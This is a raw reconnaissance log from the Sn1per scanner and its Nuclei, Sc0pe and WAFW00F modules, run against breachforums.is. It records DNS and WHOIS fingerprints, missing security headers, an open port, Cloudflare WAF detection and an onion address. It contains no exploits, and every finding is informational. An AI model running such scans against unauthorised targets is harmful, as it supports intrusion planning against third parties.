[midspace-0a]  : OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[postspace-0a] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0a]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-0a]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-0a] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-0a] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-0a]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0a]: OK (TECL: 0.25 - 400) (CLTE: 0.13 - 400)                                           
[endspacerx-0a]: OK (TECL: 0.13 - 400) (CLTE: 0.13 - 400)                                           
[endspacexn-0a]: OK (TECL: 0.15 - 400) (CLTE: 0.13 - 400)                                           
[midspace-0b]  : OK (TECL: 0.13 - 400) (CLTE: 0.10 - 400)                                           
[postspace-0b] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0b]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-0b]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-0b] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-0b] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[rxprespace-0b]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0b]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-0b]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-0b]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-0c]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-0c] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0c]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspace-0c]  : OK (TECL: 0.12 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-0c] : OK (TECL: 0.10 - 400) (CLTE: 0.12 - 400)                                           
[endspacex-0c] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-0c]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0c]: OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[endspacerx-0c]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-0c]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[midspace-0d]  : OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[postspace-0d] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[prespace-0d]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-0d]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-0d] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-0d] : OK (TECL: 0.11 - 400) (CLTE: 0.22 - 400)                                           
[rxprespace-0d]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0d]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-0d]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-0d]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-1f]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-1f] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[prespace-1f]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspace-1f]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-1f] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-1f] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-1f]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-20]  : OK (TECL: 0.11 - 400) (CLTE: 0.09 - 400)                                           
[postspace-20] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-20]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspace-20]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-20] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-20] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[rxprespace-20]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-20]: OK (TECL: 0.12 - 400) (CLTE: 0.15 - 400)                                           
[endspacerx-20]: OK (TECL: 0.13 - 400) (CLTE: 0.13 - 400)                                           
[endspacexn-20]: OK (TECL: 0.14 - 400) (CLTE: 0.14 - 400)                                           
[midspace-7f]  : OK (TECL: 0.13 - 400) (CLTE: 0.11 - 400)                                           
[postspace-7f] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-7f]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-7f]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-7f] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-7f] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-7f]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-7f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-7f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-7f]: OK (TECL: 0.11 - 400) (CLTE: 0.09 - 400)                                           
[midspace-a0]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-a0] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[prespace-a0]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-a0]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-a0] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-a0] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-a0]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-a0]: OK (TECL: 0.11 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-a0]: OK (TECL: 0.09 - 400) (CLTE: 0.12 - 400)                                           
[endspacexn-a0]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-ff] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[endspace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-ff] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-ff] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-ff]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-ff]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-ff]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-ff]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
====================================================================================•x[2023-09-17](20:19)x•
 RUNNING NUCLEI SCAN 
====================================================================================•x[2023-09-17](20:19)x•
[dns-saas-service-detection:cloudflare-cdn] [dns] [info] breachforums.is
[nameserver-fingerprint] [dns] [info] breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]
[txt-fingerprint] [dns] [info] breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                                                                         
[mx-fingerprint] [dns] [info] breachforums.is [10 mail.breachforums.is.]
[dmarc-detect] [dns] [info] _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]
[http-missing-security-headers:strict-transport-security] [http] [info] https://breachforums.is/
[http-missing-security-headers:content-security-policy] [http] [info] https://breachforums.is/
[http-missing-security-headers:x-content-type-options] [http] [info] https://breachforums.is/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] https://breachforums.is/
[http-missing-security-headers:clear-site-data] [http] [info] https://breachforums.is/
[rdap-whois:raw] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted rights.\nExcept for agreed Internet operational purposes, no part of this publication may be reproduced, stored \nin a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, recording, or \notherwise, without prior permission from ISNIC. Any use of this material to target advertising or similar \nactivities is explicitly forbidden and will be prosecuted. ISNIC requests to be notified of any such \nactivities or suspicions thereof."],"links":[{"href":"https://www.isnic.is/en/about/copyright","rel":"self","type":"text/html","value":"https://www.isnic.is/en/about/copyright"}],"title":"Copyright ©2023"},{"description":["23.162.0.39/32","2023-09-18 03:26:24.461231+00"],"title":"client info"}],"objectClassName":"domain","rdapConformance":["rdap_level_0","isnic_level_0"],"secureDNS":{"delegationSigned":false},"status":["active"],"unicodeName":"breachforums.is"}]                                                       
[rdap-whois:email] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                                                                                                               
[rdap-whois:secureDNS] [http] [info] https://rdap.isnic.is/rdap/domain/breachforums.is [false]
[waf-detect:cloudflare] [http] [info] http://breachforums.is:80/
====================================================================================•x[2023-09-17](20:29)x•
 RUNNING SC0PE WEB VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](20:29)x•
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:80//, Server: cloudflare
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
====================================================================================•x[2023-09-17](20:31)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](20:31)x•
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
====================================================================================•x[2023-09-17](20:31)x•
====================================================================================•x[2023-09-17](20:31)x•
====================================================================================
•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• 
====================================================================================
Critical: 0
High: 0
Medium: 0
Low: 0
Info: 17
Score: 17
====================================================================================
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:80//, Server: cloudflare
====================================================================================
====================================================================================•x[2023-09-17](20:31)x•
 SCAN COMPLETE! 
====================================================================================•x[2023-09-17](20:31)x•
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

[*] Opening loot directory /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
 + -- --=[ Generating reports...
[|]
 + -- --=[ Sorting all files...
 + -- --=[ Removing blank screenshots and files...
 + -- --=[ Done!
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
[*] Checking for active internet connection [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.2 by @xer0dayz                                                                                  
                                                                                                                    
                                                                                                                    
               ;               ,                                                                                    
             ,;                 '.                                                                                  
            ;:                   :;                                                                                 
           ::                     ::                                                                                
           ::                     ::                                                                                
           ':                     :                                                                                 
            :.                    :                                                                                 
         ;' ::                   ::  '                                                                              
        .'  ';                   ;'  '.                                                                             
       ::    :;                 ;:    ::                                                                            
       ;      :;.             ,;:     ::                                                                            
       :;      :;:           ,;"      ::                                                                            
       ::.      ':;  ..,.;  ;:'     ,.;:                                                                            
        "'"...   '::,::::: ;:   .;.;""'                                                                             
            '"""....;:::::;,;.;"""                                                                                  
        .:::.....'"':::::::'",...;::::;.                                                                            
       ;:' '""'"";.,;:::::;.'""""""  ':;                                                                            
      ::'         ;::;:::;::..         :;                                                                           
     ::         ,;:::::::::::;:..       ::                                                                          
     ;'     ,;;:;::::::::::::::;";..    ':.                                                                         
    ::     ;:"  ::::::"""'::::::  ":     ::                                                                         
     :.    ::   ::::::;  :::::::   :     ;                                                                          
      ;    ::   :::::::  :::::::   :    ;                                                                           
       '   ::   ::::::....:::::'  ,:   '                                                                            
        '  ::    :::::::::::::"   ::                                                                                
           ::     ':::::::::"'    ::                                                                                
           ':       """""""'      ::                                                                                
            ::                   ;:                                                                                 
            ':;                 ;:"                                                                                 
    -hrr-     ';              ,;'                                                                                   
                "'           '"                                                                                     
                  ''''                                                                                              

====================================================================================•x[2023-09-17](20:31)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2023-09-17](20:31)x•
 + -- --=[Port 8080 opened... running tests...
====================================================================================•x[2023-09-17](20:31)x•
 CHECKING HTTP HEADERS AND METHODS 
====================================================================================•x[2023-09-17](20:31)x•
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 03:31:20 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 18 Sep 2023 04:31:20 GMT
Location: https://breachforums.is/
Server: cloudflare
CF-RAY: 808683f77f212f17-LAX

HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 03:31:21 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 18 Sep 2023 04:31:21 GMT
Location: https://breachforums.is/
Server: cloudflare
CF-RAY: 808683f85c2e0fb7-LAX

HTTP/2 403 
date: Mon, 18 Sep 2023 03:31:21 GMT
content-type: text/html
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 808683f96a820fc1-LAX

====================================================================================•x[2023-09-17](20:31)x•
 DISPLAYING META GENERATOR TAGS 
====================================================================================•x[2023-09-17](20:31)x•
====================================================================================•x[2023-09-17](20:31)x•
 DISPLAYING COMMENTS 
====================================================================================•x[2023-09-17](20:31)x•
====================================================================================•x[2023-09-17](20:31)x•
 DISPLAYING SITE LINKS 
====================================================================================•x[2023-09-17](20:31)x•
====================================================================================•x[2023-09-17](20:31)x•
 CHECKING FOR WAF 
====================================================================================•x[2023-09-17](20:31)x•

                ______
               /      \                                                                                             
              (  W00f! )                                                                                            
               \  ____/                                                                                             
               ,,    __            404 Hack Not Found                                                               
           |`-.__   / /                      __     __                                                              
           /"  _/  /_/                       \ \   / /                                                              
          *===*    /                          \ \_/ /  405 Not Allowed                                              
         /     )__//                           \   /                                                                
    /|  /     /---`                        403 Forbidden                                                            
    \\/`   \ |                                 / _ \                                                                
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error                                           
      `_____``-`                             /_/   \_\                                                              
                                                                                                                    
                        ~ WAFW00F : v2.2.0 ~                                                                        
        The Web Application Firewall Fingerprinting Toolkit                                                         
                                                                                                                    
[*] Checking http://breachforums.is
[+] The site http://breachforums.is is behind Cloudflare (Cloudflare Inc.) WAF.
[~] Number of requests: 2

====================================================================================•x[2023-09-17](20:31)x•
 GATHERING HTTP INFO 
====================================================================================•x[2023-09-17](20:31)x•
http://breachforums.is:8080 [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[cloudflare], IP[104.22.50.133], RedirectLocation[https://breachforums.is/], UncommonHeaders[cf-ray]
https://breachforums.is/ [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[cloudflare], IP[172.67.5.22], Title[403 Forbidden], UncommonHeaders[cf-cache-status,cf-ray]                                                                  

====================================================================================•x[2023-09-17](20:31)x•
 GATHERING WEB FINGERPRINT 
====================================================================================•x[2023-09-17](20:31)x•
 onion-location: http://breachedu76kdyavc6szj6ppbplfqoz3pgrk3zw57my4vybgblpfeayd.onion
 CF-Cache-Status: DYNAMIC
 Server: cloudflare
 CF-RAY: 80868447d96f0ff3-LAX
